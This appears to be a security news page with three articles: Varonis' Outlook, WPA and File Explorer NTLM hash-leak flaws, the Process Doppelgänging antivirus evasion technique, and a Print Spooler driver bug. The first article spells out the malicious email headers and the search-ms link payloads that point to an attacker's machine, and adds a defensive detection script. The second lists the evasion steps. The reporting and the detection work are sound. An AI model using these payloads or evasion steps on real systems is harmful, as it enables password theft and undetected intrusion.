Information Security News|Cyber Security|Hacking Tutorial (https://www.securitynewspaper.com/)

How to steal Windows password via Outlook email exploiting vulnerabilities in Windows Performance Analyzer (WPA) and File Explorer
https://www.securitynewspaper.com/2024/01/22/how-to-steal-windows-password-via-outlook-email-exploiting-vulnerabilities-in-windows-performance-analyzer-wpa-and-file-explorer/
Mon, 22 Jan 2024 22:22:54 +0000

The post How to steal Windows password via Outlook email exploiting vulnerabilities in Windows Performance Analyzer (WPA) and File Explorer appeared first on Information Security Newspaper | Hacking News.

Varonis Threat Labs has uncovered a significant vulnerability in Microsoft Outlook (CVE-2023-35636) that allows attackers to access NTLM v2 hashed passwords. This discovery also includes vulnerabilities in Windows Performance Analyzer (WPA) and Windows File Explorer, posing serious security risks.

What is CVE-2023-35636?

CVE-2023-35636 is a vulnerability in the calendar sharing function of Microsoft Outlook. By adding two specific headers to an email, an attacker can make Outlook treat the message as shared content and contact a machine of the attacker's choosing, which lets the attacker capture an NTLM v2 hash.

Understanding NTLM v2

NTLM v2 is an authentication protocol used by Microsoft Windows to authenticate users to remote servers. Although more secure than its predecessor, NTLM v2 remains vulnerable to offline brute-force and authentication relay attacks: the protocol transmits password hashes rather than passwords, and because those hashes are unsalted they are effectively password-equivalent.

Exploitation of NTLM v2 Hashes

Attackers can use NTLM v2 hashes in two primary ways:

  1. Offline brute-force attacks: The attacker obtains a copy of the NTLM v2 hash and tries candidate passwords against it until one matches.
  2. Authentication relay attacks: The attacker intercepts an NTLM v2 authentication request and forwards it to a different server to authenticate there as the victim.

Leaking NTLM v2 Hashes Using Outlook

The Outlook vulnerability lies in its calendar sharing feature. By crafting an email with specific headers, attackers can redirect the hashed password to their machine.

The Outlook Exploit:
  1. “Content-Class” = “Sharing” — Indicates the email contains sharing content.
  2. “x-sharing-config-url” = \\(Attacker machine)\a.ics — Directs the victim’s Outlook to the attacker’s machine.

Leaking NTLM v2 Hashes Using URI Handlers and WPA

URI handlers in operating systems let applications register for specific URI schemes. Windows Performance Analyzer (WPA) registers the “WPA://” handler by default. Attackers can abuse this handler to make the victim's machine authenticate with NTLM v2 over the open web.

The WPA Exploit

The exploit involves a simple payload that directs the victim’s machine to access the attacker’s machine via SMB, potentially leaking the NTLM v2 hash.

Attack Scenario

Step 1: Crafting the Malicious Email

  1. Attacker’s Preparation: The attacker prepares an email with two specific headers:
    • "Content-Class" = "Sharing": This header tells Outlook that the email contains sharing content.
    • "x-sharing-config-url" = \\[Attacker's Machine]\a.ics: This header points the victim’s Outlook to a file (a.ics) hosted on the attacker’s machine.

Step 2: Victim Receives the Email

  1. Victim’s Action: The victim receives the email and interacts with it (e.g., clicks on a link or button in the email that says “Open this iCal”).
  2. Outlook’s Response: Due to the headers in the email, Outlook attempts to retrieve the a.ics file from the attacker’s machine.

Step 3: Intercepting the NTLM v2 Hash

  1. Hash Transmission: When Outlook tries to access the file on the attacker’s machine, it sends an NTLM v2 hash of the user’s password for authentication.
  2. Attacker’s Interception: The attacker captures this hash.

Step 4: Exploiting the Hash

  1. Offline Brute-Force Attack: The attacker uses the captured hash to perform an offline brute-force attack. This involves trying various password combinations against the hash until a match is found.
  2. Gaining Unauthorized Access: Once the correct password is determined, the attacker can use it to access the victim’s account or system.

Example

Imagine a scenario where Alice, an employee at a corporation, receives an email that appears to be a calendar invite from a colleague. The email contains a button saying “Open this iCal”. Unbeknownst to Alice, the email is actually from an attacker and is crafted to exploit CVE-2023-35636.

When Alice clicks the button, her Outlook tries to fetch the a.ics file from what she believes is her colleague’s machine but is actually the attacker’s server. During this process, her computer sends an NTLM v2 hash of her password to the attacker’s server for authentication.

The attacker, now in possession of Alice’s NTLM v2 hash, uses a powerful computer to perform an offline brute-force attack. Eventually, the attacker discovers Alice’s actual password and gains unauthorized access to her corporate account, potentially leading to data theft or further network compromise.

Leaking NTLM v2 Hashes Using Windows File Explorer

A similar attack to the Outlook one can be carried out through Windows File Explorer. It abuses the “subquery” and “crumb” parameters of the “search-ms” URI handler registered by Windows File Explorer.

Background: Windows File Explorer and URI Handlers

Windows File Explorer, known as explorer.exe, is the file management application in Windows. It registers a URI handler for a special type of link (search-ms://) that can trigger specific actions within File Explorer.

Attack Scenario Using Windows File Explorer

Step 1: Crafting the Malicious Link

  1. Attacker’s Preparation: The attacker creates a malicious link using the search-ms URI scheme. This link includes special parameters that will direct the victim’s File Explorer to the attacker’s machine. There are two methods to do this:
    • Using the “subquery” parameter: search-ms://query=poc&subquery=\\[Attacker's Machine]\poc.search-ms
    • Using the “crumb” parameter: search-ms://query=poc&crumb=location:\\[Attacker's Machine]

Step 2: Delivering the Malicious Link

  1. Distribution: The attacker sends this link to the victim via email, social media, or other means. The link might be disguised as a legitimate search query or file request.

Step 3: Victim Interacts with the Link

  1. Victim’s Action: The victim clicks on the link, believing it to be legitimate.
  2. File Explorer’s Response: The victim’s File Explorer attempts to execute the search or access the file specified in the link, which points to the attacker’s machine.

Step 4: Intercepting the NTLM v2 Hash

  1. Hash Transmission: To access the resource on the attacker’s machine, the victim’s system sends an NTLM v2 hash of the user’s password for authentication.
  2. Attacker’s Interception: The attacker captures this hash from their machine.

Step 5: Exploiting the Hash

  1. Offline Brute-Force Attack: The attacker uses the captured hash to perform an offline brute-force attack, attempting to find the actual password.
  2. Gaining Unauthorized Access: If successful, the attacker can use the password to gain unauthorized access to the victim’s system or network.

Example

Consider a scenario where Bob, a user, receives an email with a link that appears to direct him to a useful file search on his company’s network. The link is actually a malicious search-ms URL crafted by an attacker. When Bob clicks the link, his File Explorer tries to execute the search, which unknowingly points to the attacker’s server.

As File Explorer attempts to access the resource, it sends an NTLM v2 hash of Bob’s password for authentication. The attacker captures this hash and then uses various tools to crack the password offline. Once the password is obtained, the attacker can potentially access Bob’s computer or other resources within the company’s network.

This attack scenario demonstrates the potential vulnerability within Windows File Explorer when handling specially crafted search-ms URLs. It highlights the importance of being cautious with links, even those that seem to be internal file or search requests, and the need for robust security measures to protect against such NTLM hash theft attacks. Varonis Threat Labs also discovered vulnerabilities in Windows File Explorer’s process, explorer.exe, particularly in the “subquery” and “crumb” parameters of the URI handler “search-ms”.

The Windows File Explorer Exploits

  1. Using the “subquery” parameter: This method directs explorer.exe to connect to a remote SMB, leaking the NTLM v2 hash.
  2. Using the “crumb” parameter: Similar to the “subquery” exploit, this method also leads to the theft of the hashed password.
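Both patterns described above, the Outlook sharing headers pointing at a UNC path and the search-ms links whose subquery or crumb parameter points at a remote host, can be checked on the defender's side before a message or link reaches a user. The following scanner is an added example, not code from Varonis or the article; the header names and parameters are those the article describes, while the sample message and the 192.0.2.10 address are constructed.

```python
"""Flag the NTLM-leak indicators described above in mail headers and search-ms links.
Added example (not Varonis' or Microsoft's code); all sample inputs are constructed."""
import re
from email import message_from_string
from urllib.parse import parse_qs, unquote

# A UNC path (\\host\share, //host/share) or a file:// URL naming a remote host.
# A local path such as C:\Users or file:///C:/... deliberately does not match.
UNC_RE = re.compile(r'^(\\\\|//|file://)[^\\/]+', re.IGNORECASE)


def is_remote_path(value: str) -> bool:
    """True if opening this value would make Windows connect to a remote host over SMB."""
    return bool(UNC_RE.match(unquote(value).strip()))


def check_sharing_headers(raw_message: str) -> list:
    """Findings for an RFC 822 message carrying the Outlook sharing headers
    with a config URL that points off-host (the CVE-2023-35636 pattern)."""
    msg = message_from_string(raw_message)
    content_class = (msg.get('Content-Class') or '').strip().lower()
    cfg_url = (msg.get('x-sharing-config-url') or '').strip()
    if content_class == 'sharing' and cfg_url and is_remote_path(cfg_url):
        return [f'outlook-sharing-unc: {cfg_url}']
    return []


def check_search_ms(uri: str) -> list:
    """Findings for a search-ms: link whose subquery or crumb parameter
    names a remote host (the explorer.exe pattern described above)."""
    if not uri.lower().startswith('search-ms:'):
        return []
    # search-ms://query=...&crumb=... : drop the scheme and any leading slashes.
    query = re.sub(r'^search-ms:/*', '', uri, flags=re.IGNORECASE)
    params = parse_qs(query, keep_blank_values=True)
    findings = []
    for name in ('subquery', 'crumb'):
        for raw in params.get(name, []):
            value = raw
            if name == 'crumb' and raw.lower().startswith('location:'):
                value = raw.split(':', 1)[1]  # crumb=location:\\host
            if is_remote_path(value):
                findings.append(f'search-ms-{name}-unc: {value}')
    return findings


# Constructed sample message in the shape the article describes.
SAMPLE_MESSAGE = (
    "From: colleague@example.invalid\r\n"
    "To: alice@example.invalid\r\n"
    "Subject: Shared calendar\r\n"
    "Content-Class: Sharing\r\n"
    "x-sharing-config-url: \\\\192.0.2.10\\a.ics\r\n"
    "\r\n"
    "Open this iCal\r\n"
)

if __name__ == '__main__':
    print(check_sharing_headers(SAMPLE_MESSAGE))
    print(check_search_ms(r'search-ms://query=poc&crumb=location:\\192.0.2.10'))
```

The check only looks at the indicators the article names; a mail gateway or link-rewriting proxy would call these two functions on each message and each search-ms link it sees.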

Microsoft’s Response

Microsoft has acknowledged the Outlook vulnerability, CVE-2023-35636, with a severity rating of Important and released a patch on December 12, 2023. The reports for WPA and Windows File Explorer were closed as being of “moderate severity.”

Protecting Against NTLM v2 Attacks

To safeguard against these vulnerabilities, it is recommended to:

  • Enable SMB signing.
  • Block outgoing NTLM v2, especially on Windows 11 (25951) and later.
  • Prefer Kerberos authentication and block NTLM v2 at network and application levels.

Unpatched systems remain at risk, and it’s crucial to update and apply security measures to prevent potential exploits.


New Malware Evasion Technique Works On All Windows Versions
https://www.securitynewspaper.com/2017/12/07/new-malware-evasion-technique-works-windows-versions/
Thu, 07 Dec 2017 15:25:26 +0000

The post New Malware Evasion Technique Works On All Windows Versions appeared first on Information Security Newspaper | Hacking News.

A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools.

Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader.

Ensilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at Black Hat 2017 Security conference held in London.

Process Doppelgänging Works on All Windows Versions

Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10.

Tal Liberman, the head of the research team at enSilo, told The Hacker News that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products.

In a Process Hollowing attack, hackers replace the memory of a legitimate process with malicious code so that the malicious code runs in place of the original, tricking process monitoring tools and antivirus into believing that the original process is running.

Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore.

On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows.

Here’s How the Process Doppelgänging Attack Works:

Before going further into how this new code injection attack works, you need to understand what a Windows NTFS Transaction is and how an attacker could leverage it to hide his malicious actions from detection.

NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically.

NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely.

According to the researchers, Process Doppelgänging is a fileless attack and works in four major steps:

  1. Transact—open a legitimate executable inside an NTFS transaction and then overwrite it with a malicious file.
  2. Load—create a memory section from the modified (malicious) file.
  3. Rollback—roll back the transaction (deliberately failing it), which removes all changes to the legitimate executable as if they had never existed.
  4. Animate—bring the doppelganger to life. Use the older implementation of the Windows process loader to create a process from the memory section created in step 2, which is actually malicious and was never saved to disk, “making it invisible to most recording tools such as modern EDRs.”

Process Doppelgänging Evades Detection from Most Antiviruses

[Image: Process Doppelgänging malware evasion technique, Mimikatz running without an antivirus warning]

Liberman told The Hacker News that during their research they tested their attack against security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advanced forensic tools like Volatility.

In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection.

When the researchers ran Mimikatz normally on a Windows operating system, the Symantec antivirus solution caught the tool immediately, as shown below:

[Image: Process Doppelgänging malware evasion technique, Symantec antivirus flagging Mimikatz when run normally]

However, Mimikatz ran stealthily, without the antivirus displaying any warning, when executed using Process Doppelgänging, as shown in the image at the top of this article.

Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year.

But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users’ computers.

Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10.

I don’t expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks.

Source: https://www.digitechengine.com/new-malware-evasion-technique-works-on-all-windows-versions/


Vulnerability Exploitable via Printer Protocols Affects All Windows Versions
https://www.securitynewspaper.com/2016/07/13/vulnerability-exploitable-via-printer-protocols-affects-windows-versions/
Wed, 13 Jul 2016 08:50:11 +0000

The post Vulnerability Exploitable via Printer Protocols Affects All Windows Versions appeared first on Information Security Newspaper | Hacking News.

Introducing vulnerability of the year: CVE-2016-3238. Microsoft patched today a critical security vulnerability in the Print Spooler service that allows attackers to take over devices via a simple mechanism. The vulnerability affects all Windows versions ever released.

Security firm Vectra discovered the vulnerability (CVE-2016-3238), which Microsoft fixed in MS16-087. At its core, the issue resides in how Windows handles printer driver installations and how end users connect to printers.

Exploit executes payload under SYSTEM user

By default, in corporate networks, network admins allow printers to deliver the necessary drivers to workstations connected to the network. These drivers are silently installed without any user interaction and run under the SYSTEM user, with all the available privileges.

Vectra researchers discovered that an attacker can replace these drivers on the printer with malicious files that allow him to execute any code he’d like on the infected machine.

The attack can be launched from the local network or via the Internet, thanks to the Internet Printing Protocol or the webPointNPrint protocol. This type of attack can be delivered via innocuous methods such as ads (malvertising) or JavaScript code hidden in compromised websites.

Attacks can take place in several ways

There are numerous ways in which these attacks can take place, making CVE-2016-3238 a very dangerous issue for corporate environments.

A threat actor could compromise a company’s Internet-connected printers, either with common username-password combinations or by exploiting vulnerabilities to break into the printer, and then replace the printing drivers it serves with malicious content. Compromising printers is exceptionally easy these days, as the Weev incident has recently shown us.

If the printer is behind a firewall, an attacker can hack another device or computer on that network, and use it to pivot to the printer and host his malicious files.

If the printer can’t be hacked, or doesn’t have any type of vulnerabilities, the attacker can just spoof the printer via special software. Computers on the attacked network would connect to the fake printer and download the attacker’s malicious code.

Watering hole attacks via printers

Because printers behave like servers, with multiple computers connecting to them to download drivers and print documents, an attacker who poisons a printer’s drivers is effectively executing a watering hole attack through the printer. Watering hole attacks, or drive-by downloads, are the methods through which exploit kits function.

By this point in time, CVE-2016-3238 is by far the vulnerability of the year: it is easy to exploit, offers several ways to launch attacks, and affects a huge number of users.

Vectra’s researchers have prepared a technical breakdown of the vulnerability on their blog, but they have also made available the following video presentation. Microsoft says it fixed the vulnerability “by issuing a warning to users who attempt to install untrusted printer drivers.”

Source: https://news.softpedia.com/

